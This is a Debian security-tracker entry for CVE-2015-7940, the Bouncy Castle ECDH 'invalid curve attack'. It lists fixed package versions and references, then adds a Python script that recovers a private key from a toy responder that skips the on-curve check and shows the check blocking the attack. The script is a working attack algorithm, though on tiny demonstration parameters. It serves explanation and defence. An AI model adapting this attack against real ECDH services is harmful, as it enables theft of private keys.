CVE-2015-7940

Name: CVE-2015-7940
Description: The Bouncy Castle Java library before 1.51 does not validate that a point is on the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie-Hellman (ECDH) key exchanges, aka an "invalid curve attack."
Source: CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SuSE, Mageia, GitHub code/issues, web search, more)
References: DLA-361-1, DSA-3417-1
NVD severity: medium (attack range: remote)
Debian Bugs: 802671

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package      Release                     Version                 Status
bouncycastle (PTS)  wheezy                      1.44+dfsg-3.1+deb7u1    fixed
                    wheezy (security)           1.44+dfsg-3.1+deb7u2    fixed
                    jessie (security), jessie   1.49+dfsg-3+deb8u2      fixed
                    stretch                     1.56-1                  fixed
                    buster, sid                 1.57-1                  fixed

The information below is based on the following data on fixed versions.

Package       Type    Release     Fixed Version          Urgency  Origin      Debian Bugs
bouncycastle  source  (unstable)  1.51-1                 medium               802671
bouncycastle  source  jessie      1.49+dfsg-3+deb8u1     medium   DSA-3417-1
bouncycastle  source  squeeze     1.44+dfsg-2+deb6u1     medium   DLA-361-1
bouncycastle  source  wheezy      1.44+dfsg-3.1+deb7u1   medium   DSA-3417-1

Notes

https://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html
Commits: https://github.com/bcgit/bc-java/commit/5cb2f05
Possibly needed to include as well: https://github.com/bcgit/bc-java/commit/e25e94a
Peter Dettman <peter.dettman@bouncycastle.org> offered to assist if backporting fails and to review the result.
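The following script is an added illustration of the bug class named in the description and in the blog post linked above; it is not code from Bouncy Castle, from the linked post, or from Debian. It models an ECDH responder over a tiny field (p = 263, a = 7, victim key d = 173 and the search bound of 60 for small prime orders are all arbitrary toy choices) that multiplies whatever point it receives by its private key without checking that the point lies on the agreed curve. Because the affine addition formulas use the coefficient a but never b, the attacker can send points of small prime order q taken from curves y^2 = x^3 + a*x + b' with the wrong b'; each response leaks d mod q up to sign, and the Chinese remainder theorem plus a check against the victim's public key recovers d. The same attacker is then run against a responder that performs the on-curve check the fix adds, and is rejected on the first crafted point. For simplicity the toy responder hands back the raw x-coordinate of the shared point; a real target would feed it through a KDF, and the attacker would instead use a MAC or decryption failure as the oracle, which changes nothing about the arithmetic.

```python
"""Toy invalid-curve attack on ECDH (the bug class of CVE-2015-7940) and the
on-curve check that stops it.  Constructed example, not Bouncy Castle code:
p = 263, a = 7 and the victim key d = 173 are arbitrary toy parameters."""
from itertools import product
from math import prod

P, A, O = 263, 7, None   # toy field prime, curve coefficient a, point at infinity

def add(p1, p2):
    # Affine addition on y^2 = x^3 + A*x + b.  The formulas use A but never b,
    # so a point from a curve with the wrong b is processed without complaint.
    if p1 is O or p2 is O:
        return p2 if p1 is O else p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return O
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def mul(k, pt):
    # Double-and-add scalar multiplication.
    acc = O
    while k:
        if k & 1:
            acc = add(acc, pt)
        pt, k = add(pt, pt), k >> 1
    return acc

x_of = lambda pt: None if pt is O else pt[0]           # shared-secret material
is_prime = lambda n: n > 1 and all(n % q for q in range(2, int(n**0.5) + 1))
nonsingular = lambda b: (4 * A**3 + 27 * b * b) % P != 0
SQRT = {r: [y for y in range(P) if y * y % P == r] for r in range(P)}

def points_on(b):
    # All affine points of y^2 = x^3 + A*x + b; the group order is len(...) + 1.
    return [(x, y) for x in range(P) for y in SQRT[(x**3 + A * x + b) % P]]

def choose_curve():
    # The agreed "real" curve: first b whose group has prime order N (like P-256).
    for b in range(P):
        pts = points_on(b)
        if nonsingular(b) and is_prime(len(pts) + 1):
            return b, len(pts) + 1, pts[0]
B, N, G = choose_curve()

def on_curve(pt):
    # The check the vulnerable code skipped: is pt really on y^2 = x^3 + A*x + B?
    return pt is not O and all(0 <= c < P for c in pt) and \
        (pt[1]**2 - pt[0]**3 - A * pt[0] - B) % P == 0

def make_victim(d, validate):
    # ECDH responder: returns x(d*peer) for its KDF; validate=False models the pre-1.51 bug.
    def ecdh_x(peer):
        if validate and not on_curve(peer):
            raise ValueError("peer point not on curve")
        return x_of(mul(d, peer))
    return ecdh_x

def small_order_points(limit):
    # Points of distinct small prime order q on curves y^2 = x^3 + A*x + b' with
    # the wrong b', collected until the product of the q exceeds limit.
    found = {}
    for b2 in (b for b in range(P) if b != B and nonsingular(b)):
        pts = points_on(b2)
        n2 = len(pts) + 1
        for q in (q for q in range(2, 60) if n2 % q == 0 and is_prime(q) and q not in found):
            found[q] = next(r for r in pts if mul(q, r) is O)   # exists (Cauchy), order q
        if prod(found) > limit:
            return found
    raise RuntimeError("not enough small-order points")

def crt(rems, mods):
    m = prod(mods)
    return sum(r * (m // q) * pow(m // q, -1, q) for r, q in zip(rems, mods)) % m

def recover_private_key(oracle, pub):
    # Each small-order point T leaks d mod q up to sign (x(k*T) == x(-k*T));
    # CRT every sign combination and keep the one matching the public key.
    found, choices = small_order_points(N), []
    for q, t in found.items():
        leaked = oracle(t)                       # one ECDH exchange per crafted point
        choices.append([k for k in range(q) if x_of(mul(k, t)) == leaked])
    for combo in product(*choices):
        cand = crt(combo, list(found))
        if cand < N and mul(cand, G) == pub:
            return cand

def demo(d=173):
    # (key recovered from the unvalidated victim, whether the validating one refused)
    recovered = recover_private_key(make_victim(d, False), mul(d, G))
    try:
        recover_private_key(make_victim(d, True), mul(d, G))
        return recovered, False
    except ValueError:
        return recovered, True
```

demo() returns (173, True): the responder that skips the check gives up its key after one exchange per crafted point, the one that checks the point rejects the first of them. The script needs Python 3.8 or later for pow(x, -1, p). The on-curve check is the fix this CVE is about; on curves whose group order has a cofactor greater than one, a practitioner should additionally verify that the peer's point has the prime order of the intended subgroup (or multiply by the cofactor), since a point that is on the curve but in a small subgroup leaks information in the same way.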
